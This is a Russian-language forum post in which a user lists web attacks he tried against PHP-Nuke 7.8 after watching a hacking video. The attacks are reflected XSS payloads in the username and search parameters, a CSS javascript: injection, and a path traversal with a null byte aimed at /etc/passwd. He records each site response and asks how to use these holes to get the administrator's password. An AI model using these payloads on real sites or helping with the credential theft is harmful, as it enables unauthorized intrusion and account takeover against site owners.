Вобшем просмотрея я видео по влому нюки 7.8 попробывал некоторое из того что описано там
Пассивные XSS:
1)(параметр username)
http://ya.ru/nuke/modules.php?name=Your_Account&code=ggg&op=mailpass wd&username=<h1>[XSS] -ответ:Регистрационный код для [XSS] отправлен.

2)(дырявый поиск)
search"style="background:url(javascript:alert()) - выдал ошибку в пустом окошке.

3)http://[target]/[nuke_dir]/modules.php?name=Search
&file=../../../../../../ ../../../etc/passwd%00 -пишет You are so cool...

4)http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=[our query]
-ответ:

Результат поиска

Ничего не найдено по вашему запросу

999999999 Предыдущие

5)http://[target]/nuke75/index.php?inside_mod=1 - ответ:The html tags you attempted to use are not allowed [ Go Back ]

Вот вроде и всё подскажите плиз как мона с помощью этого узнать пас админа логин я знаю.
если можна опишите подробнее...
P.S. Извиняйте за корявое обьяснение.Заране благодарен за помощь